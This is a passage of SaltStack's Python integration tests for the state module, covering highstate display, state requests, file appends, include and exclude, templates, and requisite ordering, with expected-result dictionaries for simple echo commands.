server = MyWSGIRefServer(host="0.0.0.0", port=settings.WEBSERVER_PORT)
server.quiet = True
server.debug = True
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
